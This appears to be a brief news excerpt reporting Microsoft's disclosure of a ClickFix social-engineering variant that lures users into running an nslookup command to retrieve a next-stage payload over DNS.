Microsoft has disclosed details of a new version of the ClickFix social engineering tactic in which the attackers trick unsuspecting users into running commands that carry out a Domain Name System (DNS) lookup to retrieve the next-stage payload. Specifically, the attack relies on using the “nslookup” (short for nameserver lookup) command to execute a custom DNS lookup triggered via the Windows
Microsoft said this new variation of ClickFix uses DNS as a “lightweight staging or signaling channel,” enabling the threat actor to reach infrastructure under their control, as well as erect a new validation layer before executing the second-stage payload…
Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic…
The downloaded payload subsequently initiates an attack chain that leads to the download of a ZIP archive from an external server…
